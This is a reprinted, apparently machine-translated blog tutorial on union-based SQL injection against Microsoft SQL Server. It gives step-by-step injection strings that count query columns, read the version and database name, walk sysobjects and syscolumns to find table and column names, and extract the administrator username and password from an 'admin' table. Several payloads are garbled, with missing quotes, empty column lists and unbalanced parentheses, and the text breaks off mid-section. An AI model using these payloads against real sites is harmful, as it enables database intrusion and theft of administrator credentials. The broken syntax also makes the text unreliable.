In-depth injection of table names and field names using UNION and system tables in MSSQL

Author: zerosoul)
Blog: http://hi.baidu.com/0soul
Reprinted with copyright.

This is some injection summary made by the way during this attack and defense competition, which is summarized by the table structure of the query system. As long as the injection point is valid and the single quotes are not filtered, you can guess the complexity of its administrator table name and field name settings, and the efficiency is still very high because the union is used. You only need the DBO permission.

Take a numeric injection point as an example (for the moment, if this numeric injection point is not filtered out by single quotes)

First, use order by to guess the number of fields queried by the SQL statement and use Union for verification (Here we directly Select the sysobjects system table in the current database)

ID = 735 order by 8
ID =-735 union select, from sysobjects
Or
ID =-735 union select, from master. dbo. sysobjects

Assume that 2, 3, and 4 are displayed on the screen.
Check the version and database name by the way.

ID =-735 union select 1, @ version, db_name (), 8 from sysobjects

// Check the current database name dbname.

Then query the table name (add the second top N number from 0 to traverse the current database table name)

ID =-735 union select, (select top 1 name from sysobjects where xtype = u and name not in (select top 0 name from sysobjects where xtype = u, 6, 7, 8 from sysobjects

If you want to query the table names of other databases, you can also do this:

ID =-735 union select 1, 2, (select top 1 name from [dbname] .. sysobjects where xtype = u and name not in (select top 0 name from [dbname] .. sysobjects where xtype = u), 4,5, 6,7, 8 from sysobjects

// Check the Administrator table admin.

Continue to guess the field name (add the second top N number from 0 to traverse the field name of the admin table)

ID =-735 union select 1, 2, (select top 1 name from syscolumns where id in (select id from sysobjects where name = admin) and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name = admin), 4,5, 6,7, 8 from sysobjects

// The administrator username and password fields shown here are name and psw, respectively.

The rest is simple, and the administrator username and password can be combined in turn (the second top N can be modified to traverse the field)

// Assume that the preceding table name admin and field name, psw, are used.
ID =-735 union select top 1 1, name, psw, 8 from admin where name not in (select top 0 name from admin)

Add a system table: